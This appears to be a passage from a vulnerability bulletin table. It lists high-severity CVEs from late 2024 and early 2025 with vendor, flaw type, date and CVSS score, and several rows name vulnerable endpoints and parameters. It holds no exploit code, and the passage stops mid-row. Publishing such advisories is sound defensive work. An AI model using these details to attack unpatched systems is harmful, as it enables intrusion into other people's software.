| ashlar -- cobalt |
Ashlar-Vellum Cobalt CO File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ashlar-Vellum Cobalt. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CO files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24867. | 2024-12-30 | 7.8 | CVE-2024-13046 |
| ashlar -- cobalt |
Ashlar-Vellum Cobalt CO File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ashlar-Vellum Cobalt. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CO files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24843. | 2024-12-30 | 7.8 | CVE-2024-13047 |
| ashlar -- cobalt |
Ashlar-Vellum Cobalt XE File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ashlar-Vellum Cobalt. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XE files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24844. | 2024-12-30 | 7.8 | CVE-2024-13048 |
| ashlar -- cobalt |
Ashlar-Vellum Cobalt XE File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ashlar-Vellum Cobalt. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XE files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24847. | 2024-12-30 | 7.8 | CVE-2024-13049 |
| ashlar -- graphite |
Ashlar-Vellum Graphite VC6 File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ashlar-Vellum Graphite. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of VC6 files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24976. | 2024-12-30 | 7.8 | CVE-2024-13050 |
| ashlar -- graphite |
Ashlar-Vellum Graphite VC6 File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ashlar-Vellum Graphite. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of VC6 files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24977. | 2024-12-30 | 7.8 | CVE-2024-13051 |
| ASUS--Router |
An improper input insertion vulnerability in AiCloud on certain router models may lead to arbitrary command execution. Refer to the '01/02/2025 ASUS Router AiCloud vulnerability' section on the ASUS Security Advisory for more information. | 2025-01-02 | 7.2 | CVE-2024-12912 |
| ASUS--Router |
An unintended entry point vulnerability has been identified in certain router models, which may allow for arbitrary command execution. Refer to the ' 01/02/2025 ASUS Router AiCloud vulnerability' section on the ASUS Security Advisory for more information. | 2025-01-02 | 7.2 | CVE-2024-13062 |
| Azzaroco--WP SuperBackup |
Unrestricted Upload of File with Dangerous Type vulnerability in Azzaroco WP SuperBackup allows Upload a Web Shell to a Web Server.This issue affects WP SuperBackup: from n/a through 2.3.3. | 2024-12-31 | 10 | CVE-2024-56064 |
| Azzaroco--WP SuperBackup |
Missing Authorization vulnerability in Azzaroco WP SuperBackup allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP SuperBackup: from n/a through 2.3.3. | 2024-12-31 | 7.5 | CVE-2024-56067 |
| Azzaroco--WP SuperBackup |
Deserialization of Untrusted Data vulnerability in Azzaroco WP SuperBackup.This issue affects WP SuperBackup: from n/a through 2.3.3. | 2024-12-31 | 7.5 | CVE-2024-56068 |
| Azzaroco--WP SuperBackup |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Azzaroco WP SuperBackup allows Reflected XSS.This issue affects WP SuperBackup: from n/a through 2.3.3. | 2025-01-02 | 7.1 | CVE-2024-56069 |
| Azzaroco--WP SuperBackup |
Missing Authorization vulnerability in Azzaroco WP SuperBackup allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP SuperBackup: from n/a through 2.3.3. | 2024-12-31 | 7.4 | CVE-2024-56070 |
| BizSwoop a CPF Concepts, LLC Brand--Leads CRM |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BizSwoop a CPF Concepts, LLC Brand Leads CRM allows Reflected XSS.This issue affects Leads CRM: from n/a through 2.0.13. | 2025-01-02 | 7.1 | CVE-2024-56027 |
| Boa web--Boa web |
Boa web server - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | 2024-12-30 | 7.5 | CVE-2024-47924 |
| Boston University (IS&T)--BU Section Editing |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Boston University (IS&T) BU Section Editing allows Reflected XSS.This issue affects BU Section Editing: from n/a through 0.9.9. | 2025-01-02 | 7.1 | CVE-2024-56018 |
| ByConsole--WooODT Lite |
Missing Authorization vulnerability in ByConsole WooODT Lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooODT Lite: from n/a through 2.4.6. | 2025-01-02 | 8.8 | CVE-2023-47179 |
| Campcodes--School Faculty Scheduling System |
A vulnerability has been found in Campcodes School Faculty Scheduling System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/ajax.php?action=login. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-04 | 7.3 | CVE-2025-0210 |
| Changing Information Technology--CGFIDO |
The passwordless login mechanism in CGFIDO from Changing Information Technology has an Authentication Bypass vulnerability, allowing remote attackers with regular privileges to send a crafted request to switch to the identity of any user, including administrators. | 2024-12-31 | 8.8 | CVE-2024-12838 |
| Changing Information Technology--CGFIDO |
The login mechanism via device authentication of CGFIDO from Changing Information Technology has an Authentication Bypass vulnerability. If a user visits a forged website, the agent program deployed on their device will send an authentication signature to the website. An unauthenticated remote attacker who obtains this signature can use it to log into the system with any device. | 2024-12-31 | 8.8 | CVE-2024-12839 |
| code-projects--Online Shoe Store |
A vulnerability, which was classified as critical, has been found in code-projects Online Shoe Store 1.0. Affected by this issue is some unknown functionality of the file /function/login.php. The manipulation of the argument password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-04 | 7.3 | CVE-2025-0207 |
| CodeAstro--Simple Loan Management System |
A vulnerability was found in CodeAstro Simple Loan Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /index.php of the component Login. The manipulation of the argument email leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-30 | 7.3 | CVE-2024-13038 |
| Codezips--Project Management System |
A vulnerability was found in Codezips Project Management System 1.0. It has been classified as critical. This affects an unknown part of the file /pages/forms/course.php. The manipulation of the argument course_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 7.3 | CVE-2025-0233 |
| CridioStudio--ListingPro |
Cross-Site Request Forgery (CSRF) vulnerability in CridioStudio ListingPro allows Authentication Bypass.This issue affects ListingPro: from n/a through 2.9.4. | 2025-01-02 | 8.8 | CVE-2024-39623 |
| Crocoblock--JetEngine |
Missing Authorization vulnerability in Crocoblock JetEngine allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JetEngine: from n/a through 3.2.4. | 2025-01-02 | 7.1 | CVE-2023-48758 |
| D-Link--DIR-823G |
A vulnerability was found in D-Link DIR-823G 1.0.2B05_20181207. It has been rated as critical. This issue affects the function SetAutoRebootSettings/SetClientInfo/SetDMZSettings/SetFirewallSettings/SetParentsControlInfo/SetQoSSettings/SetVirtualServerSettings of the file /HNAP1/ of the component Web Management Interface. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-30 | 7.3 | CVE-2024-13030 |
| David Cramer--My Shortcodes |
Missing Authorization vulnerability in David Cramer My Shortcodes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects My Shortcodes: from n/a through 2.3. | 2025-01-02 | 7.1 | CVE-2023-46632 |
| davidanderson--UpdraftPlus: WP Backup & Migration Plugin |
The UpdraftPlus: WP Backup & Migration Plugin plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.24.11 via deserialization of untrusted input in the 'recursive_unserialized_replace' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. An administrator must perform a search and replace action to trigger the exploit. | 2025-01-04 | 8.8 | CVE-2024-10957 |
| DeluxeThemes--Userpro |
Missing Authorization vulnerability in DeluxeThemes Userpro.This issue affects Userpro: from n/a through 5.1.9. | 2024-12-31 | 8.8 | CVE-2024-56211 |
| DeluxeThemes--Userpro |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in DeluxeThemes Userpro.This issue affects Userpro: from n/a through 5.1.9. | 2024-12-31 | 8.5 | CVE-2024-56212 |
| DeluxeThemes--Userpro |
Path Traversal: '.../...//' vulnerability in DeluxeThemes Userpro allows Path Traversal.This issue affects Userpro: from n/a through 5.1.9. | 2024-12-31 | 8.3 | CVE-2024-56214 |
| DeluxeThemes--Userpro |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DeluxeThemes Userpro allows Reflected XSS.This issue affects Userpro: from n/a through 5.1.9. | 2024-12-31 | 7.1 | CVE-2024-56210 |
| Dreamwinner--Easy Language Switcher |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dreamwinner Easy Language Switcher allows Reflected XSS.This issue affects Easy Language Switcher: from n/a through 1.0. | 2025-01-02 | 7.1 | CVE-2024-56029 |
| DuoGeek--Custom Dashboard Widget |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DuoGeek Custom Dashboard Widget allows Reflected XSS.This issue affects Custom Dashboard Widget: from n/a through 1.0.0. | 2025-01-02 | 7.1 | CVE-2024-56024 |
| Dynamic Web Lab--Dynamic Product Category Grid, Slider for WooCommerce |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Dynamic Web Lab Dynamic Product Category Grid, Slider for WooCommerce allows PHP Local File Inclusion.This issue affects Dynamic Product Category Grid, Slider for WooCommerce: from n/a through 1.1.3. | 2024-12-31 | 7.5 | CVE-2024-56230 |
| EditionGuard Dev Team--EditionGuard for WooCommerce eBook Sales with DRM |
Cross-Site Request Forgery (CSRF) vulnerability in EditionGuard Dev Team EditionGuard for WooCommerce - eBook Sales with DRM allows Privilege Escalation.This issue affects EditionGuard for WooCommerce - eBook Sales with DRM: from n/a through 3.4.2. | 2024-12-31 | 8.8 | CVE-2024-56207 |
| Fahad Mahmood--Gulri Slider |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fahad Mahmood Gulri Slider allows Reflected XSS.This issue affects Gulri Slider: from n/a through 3.5.8. | 2024-12-31 | 7.1 | CVE-2024-56223 |
| Fla-shop.com--Interactive UK Map |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fla-shop.com Interactive UK Map allows Stored XSS.This issue affects Interactive UK Map: from n/a through 3.4.8. | 2025-01-02 | 7.1 | CVE-2024-56267 |
| Foliovision--FV Descriptions |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Foliovision FV Descriptions allows Reflected XSS.This issue affects FV Descriptions: from n/a through 1.4. | 2025-01-02 | 7.1 | CVE-2024-56032 |
| George Holmes II--Wayne Audio Player |
Cross-Site Request Forgery (CSRF) vulnerability in George Holmes II Wayne Audio Player allows Privilege Escalation.This issue affects Wayne Audio Player: from n/a through 1.0. | 2024-12-31 | 8.8 | CVE-2024-56203 |
| Google--Android |
In cc_SendCcImsInfoIndMsg of cc_MmConManagement.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 9.8 | CVE-2024-53842 |
| Google--Android |
In prepare_to_draw_into_mask of SkBlurMaskFilterImpl.cpp, there is a possible heap overflow due to improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 8.8 | CVE-2024-43767 |
| Google--Android |
there is a possible to add apps to bypass VPN due to Undeclared Permission . This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 7.8 | CVE-2024-11624 |
| Google--Android |
In DevmemValidateFlags of devicemem_server.c , there is a possible out of bounds write due to memory corruption. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 7.8 | CVE-2024-43077 |
| Google--Android |
In resizeToAtLeast of SkRegion.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 7.8 | CVE-2024-43097 |
| Google--Android |
In multiple locations, there is a possible way to avoid unbinding of a service from the system due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 7.8 | CVE-2024-43762 |
| Google--Android |
In onPrimaryClipChanged of ClipboardListener.java, there is a possible way to partially bypass lock screen. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 7.8 | CVE-2024-43764 |
| Google--Android |
In skia_alloc_func of SkDeflate.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 7.8 | CVE-2024-43768 |
| Google--Android |
In isPackageDeviceAdmin of PackageManagerService.java, there is a possible edge case which could prevent the uninstallation of CloudDpc due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 7.8 | CVE-2024-43769 |
| Google--Android |
In construct_transaction_from_cmd of lwis_ioctl.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 7.8 | CVE-2024-47032 |
| Google--Android |
In sms_DisplayHexDumpOfPrivacyBuffer of sms_Utilities.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 7.5 | CVE-2024-53834 |
| Google--Android |
there is a possible biometric bypass due to an unusual root cause. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 7.8 | CVE-2024-53835 |
| Google--Android |
In prepare_response of lwis_periodic_io.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 7.8 | CVE-2024-53837 |
| Google--Android |
In Exynos_parsing_user_data_registered_itu_t_t35 of VendorVideoAPI.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 7.8 | CVE-2024-53838 |
| Google--Android |
there is a possible biometric bypass due to an unusual root cause. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 7.8 | CVE-2024-53840 |
| Google--Android |
In startListeningForDeviceStateChanges, there is a possible Permission Bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 7.8 | CVE-2024-53841 |
| Greg Priday--Simple Proxy |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Greg Priday Simple Proxy allows Reflected XSS.This issue affects Simple Proxy: from n/a through 1.0. | 2025-01-02 | 7.1 | CVE-2024-56026 |
| GregRoss--Just Writing Statistics |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in GregRoss Just Writing Statistics allows SQL Injection.This issue affects Just Writing Statistics: from n/a through 4.7. | 2025-01-02 | 7.6 | CVE-2024-56250 |
| hcabrera--WordPress Popular Posts |
The The WordPress Popular Posts plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 7.1.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2025-01-03 | 7.3 | CVE-2024-11733 |
| HTML Forms--HTML Forms |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HTML Forms allows Reflected XSS.This issue affects HTML Forms: from n/a through 1.4.1. | 2025-01-02 | 7.1 | CVE-2024-56060 |
| IBM--Engineering Lifecycle Optimization Publishing |
IBM Engineering Lifecycle Optimization - Publishing 7.0.2 and 7.0.3 could allow a remote attacker to cause a denial of service using a complex regular expression. | 2025-01-04 | 7.5 | CVE-2024-41766 |
| IBM--Engineering Lifecycle Optimization Publishing |
IBM Engineering Lifecycle Optimization - Publishing 7.0.2 and 7.0.3 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify, or delete information in the back-end database. | 2025-01-04 | 7.3 | CVE-2024-41767 |
| IBM--WebSphere Automation |
IBM WebSphere Automation 1.7.5 could allow a remote privileged user, who has authorized access to the swagger UI, to execute arbitrary code. Using specially crafted input, the user could exploit this vulnerability to execute arbitrary code on the system. | 2024-12-30 | 7.2 | CVE-2024-54181 |
| inisev--Backup Migration |
The Backup Migration plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.6 via deserialization of untrusted input in the 'recursive_unserialize_replace' function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files, retrieve sensitive data, or execute code. An administrator must create a staging site in order to trigger the exploit. | 2025-01-04 | 8.8 | CVE-2024-10932 |
| Inspry--Agency Toolkit |
Missing Authorization vulnerability in Inspry Agency Toolkit allows Privilege Escalation.This issue affects Agency Toolkit: from n/a through 1.0.23. | 2024-12-31 | 9.8 | CVE-2024-56066 |
| Irshad--Services updates for customers |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Irshad Services updates for customers allows Reflected XSS.This issue affects Services updates for customers: from n/a through 1.0. | 2025-01-02 | 7.1 | CVE-2024-56034 |
| iTerm2--iTerm2 |
iTerm2 3.5.6 through 3.5.10 before 3.5.11 sometimes allows remote attackers to obtain sensitive information from terminal commands by reading the /tmp/framer.txt file. This can occur for certain it2ssh and SSH Integration configurations, during remote logins to hosts that have a common Python installation. | 2025-01-03 | 9.3 | CVE-2025-22275 |
| Kinhelios--Kintpv Wooconnect |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kinhelios Kintpv Wooconnect allows Stored XSS.This issue affects Kintpv Wooconnect: from n/a through 8.129. | 2024-12-31 | 7.1 | CVE-2024-56233 |
| Kurt Payne--Upload Scanner |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kurt Payne Upload Scanner allows Reflected XSS.This issue affects Upload Scanner: from n/a through 1.2. | 2025-01-02 | 7.1 | CVE-2024-56035 |
| Lemonade Coding Studio--Lemonade Social Networks Autoposter Pinterest |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Lemonade Coding Studio Lemonade Social Networks Autoposter Pinterest allows Reflected XSS.This issue affects Lemonade Social Networks Autoposter Pinterest: from n/a through 2.0. | 2025-01-02 | 7.1 | CVE-2024-56028 |
| Markyis Cool--Olivia |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Markyis Cool Olivia allows Reflected XSS.This issue affects Olivia: from n/a through 0.9.5. | 2025-01-02 | 7.1 | CVE-2024-56014 |
| Md Maruf Adnan Sami--User Referral |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Md Maruf Adnan Sami User Referral allows Reflected XSS.This issue affects User Referral: from n/a through 8.0. | 2025-01-02 | 7.1 | CVE-2024-56037 |
| mendableai--firecrawl |
Firecrawl is a web scraper that allows users to extract the content of a webpage for a large language model. Versions prior to 1.1.1 contain a server-side request forgery (SSRF) vulnerability. The scraping engine could be exploited by crafting a malicious site that redirects to a local IP address. This allowed exfiltration of local network resources through the API. The cloud service was patched on December 27th, 2024, and the maintainers have checked that no user data was exposed by this vulnerability. Scraping engines used in the open sourced version of Firecrawl were patched on December 29th, 2024, except for the playwright services which the maintainers have determined to be un-patchable. All users of open-source software (OSS) Firecrawl should upgrade to v1.1.1. As a workaround, OSS Firecrawl users should supply the playwright services with a secure proxy. A proxy can be specified through the `PROXY_SERVER` env in the environment variables. Please refer to the documentation for instructions. Ensure that the proxy server one is using is setup to block all traffic going to link-local IP addresses. | 2024-12-30 | 7.4 | CVE-2024-56800 |
| Mike Leembruggen--Simple Dashboard |
Incorrect Privilege Assignment vulnerability in Mike Leembruggen Simple Dashboard allows Privilege Escalation.This issue affects Simple Dashboard: from n/a through 2.0. | 2024-12-31 | 9.8 | CVE-2024-56071 |
| Mobotix--CCTV FW |
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | 2024-12-30 | 7.5 | CVE-2024-47917 |
| Moxa--EDR-8010 Series |
Moxa's cellular routers, secure routers, and network security appliances are affected by a critical vulnerability, CVE-2024-9140. This vulnerability allows OS command injection due to improperly restricted commands, potentially enabling attackers to execute arbitrary code. This poses a significant risk to the system's security and functionality. | 2025-01-03 | 9.8 | CVE-2024-9140 |
| Moxa--EDR-810 Series |
Moxa's cellular routers, secure routers, and network security appliances are affected by a high-severity vulnerability, CVE-2024-9138. This vulnerability involves hard-coded credentials, enabling an authenticated user to escalate privileges and gain root-level access to the system, posing a significant security risk. | 2025-01-03 | 7.2 | CVE-2024-9138 |
| n/a--n/a |
Huang Yaoshi Pharmaceutical Management Software through 16.0 allows arbitrary file upload via a .asp filename in the fileName element of the UploadFile element in a SOAP request to /XSDService.asmx. | 2025-01-02 | 10 | CVE-2024-56829 |
| n/a--n/a |
An arbitrary file upload vulnerability in the component /adminUser/updateImg of WukongCRM-11.0-JAVA v11.3.3 allows attackers to execute arbitrary code via uploading a crafted file. | 2025-01-03 | 9.8 | CVE-2024-55078 |
| n/a--n/a |
An issue in CodeAstro Complaint Management System v.1.0 allows a remote attacker to escalate privileges via the delete_e.php component. | 2025-01-03 | 9.8 | CVE-2024-55507 |
| n/a--n/a |
In Net::OAuth::Client in the Net::OAuth package before 0.29 for Perl, the default nonce is a 32-bit integer generated from the built-in rand() function, which is not cryptographically strong. | 2025-01-03 | 9.8 | CVE-2025-22376 |
| n/a--n/a |
FFmpeg version n6.1.1 has a double-free vulnerability in the fftools/ffmpeg_mux_init.c component of FFmpeg, specifically within the new_stream_audio function. | 2025-01-03 | 8.8 | CVE-2024-35365 |
| n/a--n/a |
SQL Injection vulnerability in Silverpeas 6.4.1 allows a remote attacker to obtain sensitive information via the ViewType parameter of the findbywhereclause function | 2025-01-03 | 7.5 | CVE-2024-48814 |
| n/a--Roxy-WI |
A vulnerability was found in Roxy-WI up to 8.1.3. It has been declared as critical. Affected by this vulnerability is the function action_service of the file app/modules/roxywi/roxy.py. The manipulation of the argument action/service leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 8.1.4 is able to address this issue. The identifier of the patch is 32313928eb9ce906887b8a30bf7b9a3d5c0de1be. It is recommended to upgrade the affected component. | 2025-01-03 | 8.8 | CVE-2024-13129 |
| Ondrej Donek--odPhotogallery |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ondrej Donek odPhotogallery allows Reflected XSS.This issue affects odPhotogallery: from n/a through 0.5.3. | 2025-01-02 | 7.1 | CVE-2024-56036 |
| Perfect Solution--WP eCommerce Quickpay |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Perfect Solution WP eCommerce Quickpay allows Reflected XSS.This issue affects WP eCommerce Quickpay: from n/a through 1.1.0. | 2025-01-02 | 7.1 | CVE-2024-56023 |
| PHPGurukul--Land Record System |
A vulnerability, which was classified as critical, has been found in PHPGurukul Land Record System 1.0. Affected by this issue is some unknown functionality of the file /admin/login.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 7.3 | CVE-2024-13085 |
| Priority--PRI WEB |
Priority - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor | 2024-12-30 | 7.5 | CVE-2024-47922 |
| Progress Software Corporation--WhatsUp Gold |
In WhatsUp Gold versions released before 2024.0.2, an unauthenticated attacker can configure LDAP settings. | 2024-12-31 | 9.4 | CVE-2024-12106 |
| Progress Software Corporation--WhatsUp Gold |
In WhatsUp Gold versions released before 2024.0.2, an attacker can gain access to the WhatsUp Gold server via the public API. | 2024-12-31 | 9.6 | CVE-2024-12108 |
| Quanta Computer--QOCA aim |
The QOCA aim from Quanta Computer has an Authorization Bypass Through User-Controlled Key vulnerability. By controlling the user ID parameter, remote attackers with regular privileges could access certain features as any user, modify any user's account information and privileges, leading to privilege escalation. | 2024-12-31 | 8.8 | CVE-2024-13040 |
| Red Hat--Red Hat Fuse 7 |
A flaw was found in the Hive ClusterDeployments resource in OpenShift Dedicated. In certain conditions, this issue may allow a developer account on a Hive-enabled cluster to obtain cluster-admin privileges by executing arbitrary commands on the hive/hive-controllers pod. | 2024-12-31 | 8.8 | CVE-2024-25133 |
| Red Hat--Red Hat Fuse 7 |
A flaw was found in FFmpeg's HLS playlist parsing. This vulnerability allows a denial of service via a maliciously crafted HLS playlist that triggers a null pointer dereference during initialization. | 2024-12-31 | 7.5 | CVE-2023-6603 |
| Red Hat--Red Hat Fuse 7 |
A flaw was found in the OpenShift build process, where the docker-build container is configured with a hostPath volume mount that maps the node's /var/lib/kubelet/config.json file into the build pod. This file contains sensitive credentials necessary for pulling images from private repositories. The mount is not read-only, which allows the attacker to overwrite it. By modifying the config.json file, the attacker can cause a denial of service by preventing the node from pulling new images and potentially exfiltrating sensitive secrets. This flaw impacts the availability of services dependent on image pulls and exposes sensitive information to unauthorized parties. | 2024-12-31 | 7.6 | CVE-2024-45497 |
| sendSMS--SendSMS |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SendSMS allows Reflected XSS.This issue affects SendSMS: from n/a through 1.2.9. | 2025-01-02 | 7.1 | CVE-2024-56038 |
| SeventhQueen--Kleo |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SeventhQueen Kleo allows Reflected XSS.This issue affects Kleo: from n/a before 5.4.4. | 2024-12-31 | 7.1 | CVE-2024-56209 |
| Smadar--SPS |
Smadar SPS - CWE-327: Use of a Broken or Risky Cryptographic Algorithm | 2024-12-30 | 8.4 | CVE-2024-47921 |
| spider-themes--EazyDocs |
Missing Authorization vulnerability in spider-themes EazyDocs allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects EazyDocs: from n/a through 2.3.5. | 2025-01-02 | 7.5 | CVE-2023-47648 |
| SSL Wireless--SSL Wireless SMS Notification |
Incorrect Privilege Assignment vulnerability in SSL Wireless SSL Wireless SMS Notification allows Privilege Escalation.This issue affects SSL Wireless SMS Notification: from n/a through 3.5.0. | 2024-12-31 | 9.8 | CVE-2024-56220 |
| Tecnick--TCExam |
Tecnick TCExam - CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') | 2024-12-30 | 9.8 | CVE-2024-47926 |
| Tecnick--TCExam |
Tecnick TCExam - Multiple CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | 2024-12-30 | 7.5 | CVE-2024-47925 |
| Themefic--Ultimate Addons for Contact Form 7 |
Missing Authorization vulnerability in Themefic Ultimate Addons for Contact Form 7 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ultimate Addons for Contact Form 7: from n/a through 3.2.6. | 2025-01-02 | 7.5 | CVE-2023-47693 |
| Think201--FAQs |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Think201 FAQs allows Reflected XSS.This issue affects FAQs: from n/a through 1.0.2. | 2025-01-02 | 7.1 | CVE-2024-56033 |
| Tiki Wiki--CMS |
Tiki Wiki CMS - CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') | 2024-12-30 | 9.8 | CVE-2024-47919 |
| Tiki Wiki--CMS |
Tiki Wiki CMS - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | 2024-12-30 | 7.5 | CVE-2024-47920 |
| Trend Micro, Inc.--Trend Micro Apex One |
A widget local file inclusion vulnerability in Trend Micro Apex One could allow a remote attacker to execute arbitrary code on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-12-31 | 7.5 | CVE-2024-52047 |
| Trend Micro, Inc.--Trend Micro Apex One |
